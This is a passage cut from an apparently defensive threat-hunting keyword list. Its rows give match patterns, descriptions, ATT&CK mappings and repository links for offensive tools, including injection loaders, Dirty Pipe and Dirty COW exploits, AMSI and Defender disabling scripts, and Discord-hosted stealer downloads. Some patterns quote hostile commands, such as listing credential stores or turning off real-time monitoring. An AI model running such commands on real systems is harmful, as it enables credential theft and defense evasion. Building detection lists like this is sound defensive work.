shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*Dinjector-main*",".{0,1000}Dinjector\-main.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","N/A","N/A","N/A" "*Dionach*PassHunt*",".{0,1000}Dionach.{0,1000}PassHunt.{0,1000}","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. It's designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Information Gathering","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","1","62","33","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z" "*dir C:\Users\*\AppData\Local\Microsoft\Credentials*",".{0,1000}dir\sC\:\\Users\\.{0,1000}\\AppData\\Local\\Microsoft\\Credentials.{0,1000}","offensive_tool_keyword","dir","Find the IDs of protected secrets for a specific user","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*dir_create2system.txt*",".{0,1000}dir_create2system\.txt.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*dirb *http* /usr/share/seclists/Discovery/Web-Content/big.txt*",".{0,1000}dirb\s.{0,1000}http.{0,1000}\s\/usr\/share\/seclists\/Discovery\/Web\-Content\/big\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dirb/wordlists*",".{0,1000}dirb\/wordlists.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*dircreate2system.cpp*",".{0,1000}dircreate2system\.cpp.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*dircreate2system.exe*",".{0,1000}dircreate2system\.exe.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*dircreate2system.vcxproj*",".{0,1000}dircreate2system\.vcxproj.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT 
SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*DirCreate2System-main*",".{0,1000}DirCreate2System\-main.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*Direct_Syscalls_Create_Thread.c*",".{0,1000}Direct_Syscalls_Create_Thread\.c.{0,1000}","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","2","119","18","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z" "*Direct_Syscalls_Create_Thread.exe*",".{0,1000}Direct_Syscalls_Create_Thread\.exe.{0,1000}","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. 
This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","2","119","18","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z" "*Direct_Syscalls_Create_Thread.sln*",".{0,1000}Direct_Syscalls_Create_Thread\.sln.{0,1000}","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","2","119","18","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z" "*Direct_Syscalls_Create_Thread.vcxproj*",".{0,1000}Direct_Syscalls_Create_Thread\.vcxproj.{0,1000}","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. 
This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","2","119","18","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z" "*Directory-Traversal-Payloads.*",".{0,1000}Directory\-Traversal\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*Direct-Syscalls-vs-Indirect-Syscalls.git*",".{0,1000}Direct\-Syscalls\-vs\-Indirect\-Syscalls\.git.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. 
This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","2","119","18","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z" "*dirkjan@sanoweb.nl*",".{0,1000}dirkjan\@sanoweb\.nl.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","10","10","1068","180","2024-02-13T12:41:07Z","2016-05-24T18:46:56Z" "*dirkjanm/adidnsdump*",".{0,1000}dirkjanm\/adidnsdump.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","1","N/A","N/A","9","849","104","2023-12-13T15:56:51Z","2019-04-24T17:18:46Z" "*dirkjanm/ldapdomaindump*",".{0,1000}dirkjanm\/ldapdomaindump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dirkjanm/PKINITtools*",".{0,1000}dirkjanm\/PKINITtools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - 
TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dirkjanm/PKINITtools*",".{0,1000}dirkjanm\/PKINITtools.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*dirkjanm/PrivExchange*",".{0,1000}dirkjanm\/PrivExchange.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*dirscanner.py*",".{0,1000}dirscanner\.py.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","6","512","113","2024-04-17T22:22:22Z","2021-08-18T08:58:14Z" "*dirscraper*",".{0,1000}dirscraper.{0,1000}","offensive_tool_keyword","dirscraper","Dirscraper is an OSINT scanning tool which assists penetration testers in identifying hidden. or previously unknown. directories on a domain or subdomain. 
This helps greatly in the recon stage of pentesting as it provides pentesters with a larger attack surface for the specific domain.","T1596 - T1530 - T1201","TA0040 - ","N/A","N/A","Information Gathering","https://github.com/Cillian-Collins/dirscraper","1","1","N/A","N/A","3","217","35","2019-02-24T12:22:47Z","2019-02-21T23:06:58Z" "*dirsearch -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt*",".{0,1000}dirsearch\s\-r\s\-w\s\/usr\/share\/wordlists\/seclists\/Discovery\/Web\-Content\/quickhits\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dirsearch*",".{0,1000}dirsearch.{0,1000}","offensive_tool_keyword","dirsearch","Dirsearch is a mature command-line tool designed to brute force directories and files in webservers.","T1110 - T1114 - T1100 - T1313","TA0001 - TA0007","N/A","N/A","Web Attacks","https://github.com/maurosoria/dirsearch","1","0","N/A","N/A","10","11267","2254","2024-04-30T13:55:27Z","2013-04-30T15:57:40Z" "*dirTraversal.txt*",".{0,1000}dirTraversal\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*dirTraversal-nix.txt*",".{0,1000}dirTraversal\-nix\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" 
"*dirTraversal-win.txt*",".{0,1000}dirTraversal\-win\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*dirty_sock*",".{0,1000}dirty_sock.{0,1000}","offensive_tool_keyword","POC","dirty_sock: Linux Privilege Escalation (via snapd) In January 2019. current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC","T1210 - T1211 - T1212 - T1547","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/initstring/dirty_sock","1","1","N/A","N/A","7","658","154","2019-05-09T21:34:26Z","2019-02-12T06:02:06Z" "*dirty_sock/archive/master.zip*",".{0,1000}dirty_sock\/archive\/master\.zip.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*dirtycow*",".{0,1000}dirtycow.{0,1000}","offensive_tool_keyword","dirtycow","Linux vulnerability name to go root (CVE-2016-5195) Dirty COW is a security vulnerability in the Linux kernel that affects all Linux operating systems. including Android. 
It is a privilege escalation flaw that exploits a race condition in the implementation of copy-on-write in the kernel's memory management","T1068 - T1055 - T1574.002","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","multiple pocs on github and others places ","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Dirty-Pipe/exploit-static*",".{0,1000}Dirty\-Pipe\/exploit\-static.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" "*dirtypipe-exploit/blob/main/dirtypipe.c*",".{0,1000}dirtypipe\-exploit\/blob\/main\/dirtypipe\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*-DirtyPipe-Exploits*",".{0,1000}\-DirtyPipe\-Exploits.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","N/A","N/A","6","508","137","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z" "*dirwalk.py*",".{0,1000}dirwalk\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*'Disable all http access logs'*",".{0,1000}\'Disable\sall\shttp\saccess\slogs\'.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. 
It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*disable_clamav.*",".{0,1000}disable_clamav\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*disable_clamav.rb*",".{0,1000}disable_clamav\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Disable_Privilege /Process:* /Privilege:*",".{0,1000}Disable_Privilege\s\/Process\:.{0,1000}\s\/Privilege\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","1005","200","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z" "*DisableAllWindowsSoftwareFirewalls*",".{0,1000}DisableAllWindowsSoftwareFirewalls.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - 
APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","10","10","99","14","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "*Disable-AMS1.ps1*",".{0,1000}Disable\-AMS1\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DisableAMSI(*",".{0,1000}DisableAMSI\(.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*DisableAntiPhishing*",".{0,1000}DisableAntiPhishing.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*DisableAntiPhishing.ps1*",".{0,1000}DisableAntiPhishing\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*DisableCylance.ps1*",".{0,1000}DisableCylance\.ps1.{0,1000}","offensive_tool_keyword","RandomPS-Scripts","PowerShell wrapper for a Cylance Bypass","T1055 - T1068 - T1562.001","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/xorrior/RandomPS-Scripts","1","1","N/A","8","4","313","89","2017-12-29T17:16:42Z","2015-02-25T04:52:01Z" "*DisableDefender.ps1*",".{0,1000}DisableDefender\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*disableeventvwr/*.ps1*",".{0,1000}disableeventvwr\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","27","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" "*DisableKerberosSigning*",".{0,1000}DisableKerberosSigning.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*DisableMailboxAuditing.ps1*",".{0,1000}DisableMailboxAuditing\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*DisableMFA.ps1*",".{0,1000}DisableMFA\.ps1.{0,1000}","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","8","4","333","52","2024-04-04T22:56:00Z","2023-02-09T02:08:07Z" "*DisableRealtimeMonitoring $true*",".{0,1000}DisableRealtimeMonitoring\s\$true.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*disableWinDef.cpp*",".{0,1000}disableWinDef\.cpp.{0,1000}","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","385","56","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" "*Disabling ASLR *",".{0,1000}Disabling\sASLR\s.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave 
discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","75","18","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "*discordapp.com/attachments/*/AnyDesk.exe*",".{0,1000}discordapp\.com\/attachments\/.{0,1000}\/AnyDesk\.exe.{0,1000}","offensive_tool_keyword","anydesk","Fake Anydesk distributed by discord - mars stealer","T1566 T1587","N/A","N/A","N/A","Malware","https://www.virustotal.com/gui/url/f83616f0f9cd2337ed40e22b0a675a99d58edf004b31645f56f28f020f5e4f46/detection","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*discordapp.com/attachments/*/BOINCPortable_*.exe*",".{0,1000}discordapp\.com\/attachments\/.{0,1000}\/BOINCPortable_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","BOINC","Fake BOINC software distributed by discord - mars stealer","T1566 